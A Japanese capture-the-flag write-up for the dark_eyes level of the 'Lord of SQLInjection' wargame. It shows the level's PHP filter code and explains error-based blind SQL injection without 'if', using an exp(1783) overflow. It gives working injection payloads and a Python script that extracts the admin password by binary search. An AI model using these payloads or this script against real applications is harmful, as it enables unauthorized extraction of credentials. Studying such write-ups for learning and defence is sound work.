Lord of SQLInjection

include "./config.php"; 
login_chk(); 
$db = dbconnect(); 
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit();
echo "<hr>query : <strong>{$query}</strong><hr><br>";

$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("dark_eyes");
highlight_file(__FILE__);

特徴は以下。

• pwを入力する。以下フィルターがある
  • prob,_,.,(),col,if,case,when,sleep,benchmarkは使えない
• adminのパスワードを抜き出す必要がある
• クエリの結果を受け取ることはできないが、エラー発生時は表示が変わる

Error-based Blind SQL Injection

ifを使わずにError-based Blind SQLiをする必要がある。
Writeupを見て、条件分岐の方法を色々調べた。

• IF構文を使う
  • 適当にWHEREの条件にでもif(見たい条件,エラー発生文,エラー未発生文)を書けばいい
  • 例 ' or id = 'admin' and if({md} <= length(pw), (select 1 union select 2), 2) #
• A or B ここ
  • AがtrueならBは評価されないので、Bにエラーを書いておけばtrueならエラーが出ないようにできる
  • A and Bで逆をしてもいい
  • 例 ({md} <= length(pw) and (select id union select 2))
  • なぜかうまくいかなかったりする。
• whereに条件を入れて、select内容にエラー発生原因を埋め込む ここ
  • (select exp(1783) where {md} <= length(pw))これをWhereの中にでも入れておく
  • exp(1783)はオーバーフローエラーを引き起こす

一番下を採用して解いた。

長さを取ってくる。
' or id = 'admin' and (select exp(1783) where {md} <= length(pw)) #

中身を取ってくる。
' or id = 'admin' and (select exp(1783) where {md} <= ascii(substr(pw,{i+1},1))) #

import requests

url = "https://los.rubiya.kr/chall/dark_eyes_4e0casdf02c.php"
cookie = {'PHPSESSID': 'eodctasf7efq5'}

def check(data) -> bool:
    return "<hr>query" not in data
    #return ("Hello admin" in data) or ("Hello guest" in data)

ok = 0
ng = 60

while ok + 1 != ng:
    md = (ok + ng) // 2
    q = f"' or id = 'admin' and (select exp(1783) where {md} <= length(pw)) #"
    res = requests.get(url, params={'pw': q}, cookies=cookie)
    print(f"[+] try {md}")
    if check(res.text):
        ok = md
    else:
        ng = md

length = ok
print(f"[*] length = {length}")

ans = ""
for i in range(0, length):
    ok = 0
    ng = 256

    while ok + 1 != ng:
        md = (ok + ng) // 2
        q = f"' or id = 'admin' and (select exp(1783) where {md} <= ascii(substr(pw,{i+1},1))) #"
        res = requests.get(url, params={'pw': q}, cookies=cookie)
        print(f"[+] try {md}")
        if check(res.text):
            ok = md
        else:
            ng = md

    ans += str(chr(ok))
    print(f"[*] {ans}")

print(f"[*] find! {ans}")